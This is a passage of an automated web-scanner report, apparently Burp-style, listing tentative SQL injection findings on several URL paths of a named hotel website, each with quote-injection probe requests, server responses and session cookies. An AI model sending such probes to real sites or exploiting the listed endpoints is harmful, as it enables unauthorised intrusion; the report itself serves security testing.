Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:30:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:30:15 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
1.15. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/apply

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/executive-club/apply' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:31:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:31:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/executive-club/apply'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:31:42 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:31:42 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Executive Club - 5 Star London,
...[SNIP]...
1.16. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/benefits

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/executive-club'/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:22:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:22:10 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/executive-club''/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:22:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:22:10 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
1.17. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/benefits

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/executive-club/benefits' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:26:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:26:04 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/executive-club/benefits'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:26:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:26:04 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Executive Club - 5 Star London,
...[SNIP]...
1.18. http://www.redcarnationhotels.com/meetings-and-events/facilities [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/facilities

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/facilities' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:18:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:18:17 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/facilities'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:18:18 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:18:18 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
1.19. http://www.redcarnationhotels.com/meetings-and-events/special-offers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/special-offers

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/special-offers' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:19:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:19:16 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/special-offers'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:19:18 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:19:18 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
1.20. http://www.redcarnationhotels.com/our-responsibilities/working-together [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/working-together

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /our-responsibilities/working-together' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:47:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /our-responsibilities/working-together'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:47:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:13 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Corporate & Social Responsibili
...[SNIP]...
1.21. http://www.redcarnationhotels.com/special-occasions/celebrations [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/celebrations

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /special-occasions/celebrations' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:08:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:08:09 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /special-occasions/celebrations'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:08:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:08:09 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
1.22. http://www.redcarnationhotels.com/special-occasions/escapes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/escapes

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /special-occasions/escapes' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:23:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:23:38 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /special-occasions/escapes'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:23:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:23:39 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
1.23. http://www.redcarnationhotels.com/special-occasions/tell-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/tell-us

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /special-occasions/tell-us' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:25:59 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:25:59 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /special-occasions/tell-us'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:26:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:26:00 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
1.24. http://www.redcarnationhotels.com/special-occasions/weddings [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions/weddings

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /special-occasions/weddings' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:07:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:07:55 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /special-occasions/weddings'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/special-occasions
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:07:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:07:58 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
1.25. http://www.redcarnationhotels.com/travel-agents/agents-commissions [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/agents-commissions

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /travel-agents/agents-commissions' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:48:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:19 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /travel-agents/agents-commissions'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:48:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:20 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
